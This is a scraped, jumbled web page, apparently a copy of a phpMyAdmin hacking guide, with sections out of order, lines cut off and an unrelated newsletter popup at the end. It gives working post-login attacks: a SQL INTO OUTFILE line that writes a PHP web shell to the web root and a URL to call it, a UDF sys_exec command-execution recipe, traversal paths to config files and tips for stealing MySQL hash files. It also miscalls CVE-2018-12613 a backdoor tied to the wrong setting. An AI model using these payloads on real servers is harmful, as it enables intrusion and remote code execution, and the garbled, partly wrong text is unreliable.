Phpmyadmin Hacktricks -

$cfg['Servers'][$i]['user'] = 'dbuser'; $cfg['Servers'][$i]['password'] = 'Sup3rS3cr3t'; If you manage to read system files, grab /var/lib/mysql/mysql/user.MYD or user.MYI to crack MySQL password hashes (pre-8.0 uses mysql_native_password ). Part 3: Post-Login Exploitation — The Holy Grail Once inside phpMyAdmin, here’s how you turn database access into server compromise. 1. SQL to Write a Web Shell (INTO OUTFILE) If the database user has FILE privileges, you can write a PHP shell directly to the web root.

../../etc/phpmyadmin/config.inc.php ../../var/lib/phpmyadmin/config.inc.php .../config.inc.php Look for: phpmyadmin hacktricks

For pentesters: always check for phpMyAdmin early. For defenders: assume it will be discovered, and harden accordingly. SQL to Write a Web Shell (INTO OUTFILE)

Introduction phpMyAdmin is the most popular database management tool on the planet. Written in PHP, it provides a web-based interface to manage MySQL and MariaDB servers. While it is a godsend for developers, it is a prime target for attackers. If an adversary gains access to phpMyAdmin, the game is over — they can dump credentials, escalate privileges, and even gain remote code execution (RCE) on the host server. SELECT sys_exec('whoami &gt

SELECT grantee, privilege_type FROM information_schema.user_privileges; If you have SUPER , you can change server variables, kill queries, and potentially compromise the entire DB server. CVE-2018-12613 (Authenticated RCE) In phpMyAdmin 4.8.0–4.8.1, a backdoor allows remote code execution via the $cfg['AllowArbitraryServer'] setting.

CREATE FUNCTION sys_exec RETURNS INTEGER SONAME 'lib_mysqludf_sys.so'; SELECT sys_exec('whoami > /tmp/test.txt'); Check your current privileges:

SELECT '<?php system($_GET["c"]); ?>' INTO OUTFILE "/var/www/html/shell.php"; Then call it: http://target.com/shell.php?c=id If secure_file_priv is set (prevents INTO OUTFILE ), use the general log method:

Download your free copy of our Understanding Significance Testing white paper
Subscribe to our email newsletter today to receive updates on the latest news, tutorials and events, and get your free copy of our latest white paper.
We respect your privacy. Your information is safe and will never be shared.
phpmyadmin hacktricks
Don't miss out. Subscribe today.
×
×
WordPress Popup Plugin
Scroll to Top